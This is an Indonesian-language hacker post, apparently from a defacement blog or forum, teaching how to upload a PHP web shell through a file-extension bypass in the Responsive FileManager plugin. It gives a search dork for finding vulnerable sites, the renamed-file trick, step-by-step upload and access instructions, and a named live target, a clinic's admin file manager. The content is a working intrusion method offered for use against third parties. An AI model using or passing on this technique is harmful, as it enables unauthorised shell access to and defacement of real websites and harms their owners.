=====================================

Oke kali ini gw mau ngasi tau temuan celah terbaru di plugin rfm / Responsive FileManager.
Buat kalian yg dulu deface rfm cuma bisa upload script html doang, skrng ada cara upload shell php nya nih. Oke langsung aja ke tutorialnya...

=====================================

DORK : inurl:/filemanager

=====================================

EXPLOIT :

  • /filemanager/dialog.php
  • bypass atau ubah ekstensi shell dari namashell.php ke namashell.php<?.html


=====================================

LANGKAH - LANGKAH :

  • Dorking dulu dan pilih salah satu target.
  • Live Target : https://www.gem.clinic/template/admin/filemanager/
  • Buka /filemanager/dialog.php.
  • Upload shell yang sudah kalian rename ( namashell.php<?.html )
  • Klik kanan salah satu file, dan pilih Show URL untuk melihat lokasi ke uploadnya, nah kebetulan target saya lokasi ke uploadnya di /assets/user-img/
  • Akses shellnya di "/assets/user/img/namashell.php" 
  • Extensi file .php<?.html akan otomatis ke rename menjadi .php, jadi kalian langsung buka namashell.php aja.
Oke sekian dari saya.

Mau repost artikel? Sertakan sumber nya ya mas heker hehe.

thx to : Jogjakarta Hacker Link, FilthyRoot